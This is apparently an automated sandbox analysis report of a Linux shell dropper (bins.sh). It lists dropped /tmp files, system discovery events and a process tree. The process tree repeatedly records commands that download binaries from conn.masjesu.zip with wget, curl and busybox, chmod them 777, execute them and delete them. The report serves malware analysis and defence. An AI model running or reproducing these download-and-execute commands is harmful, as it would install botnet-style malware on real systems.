N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

